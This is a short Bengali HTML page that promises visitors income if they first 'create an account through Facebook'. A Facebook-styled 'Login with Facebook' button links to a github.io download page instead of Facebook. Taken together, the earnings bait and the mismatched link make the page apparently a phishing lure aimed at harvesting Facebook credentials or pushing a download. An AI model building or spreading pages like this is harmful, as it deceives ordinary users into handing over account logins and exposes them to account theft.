<!DOCTYPE html>
<html lang="bn">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>আয় করতে লগইন করুন</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
        }
        .earnings {
            margin-top: 50px;
        }
        .login-btn {
            background-color: #3b5998;
            color: white;
            padding: 10px 20px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 18px;
            text-decoration: none; /* Remove underline from link */
        }
        .login-btn:hover {
            background-color: #2a4887;l
        }
    </style>
</head>
<body>
    <h1>আয় করতে লগইন করুন</h1>
    <div class="earnings">
        <p>আপনি আপনার ইনকাম শুরু করার পূর্বে আপনকে ফেসবুক এর মাধ্যমে একটি একাউন্ট তৈরি করতে হবে ,তৈরি  করার জন্য আপনি লগইন অপশন এ ক্লিক করুন:</p>
        <a href="https://teamxdownloadstore.github.io/Download/bal" class="login-btn" target="_blank">Login with Facebook</a>
    </div>
</body>
</html>
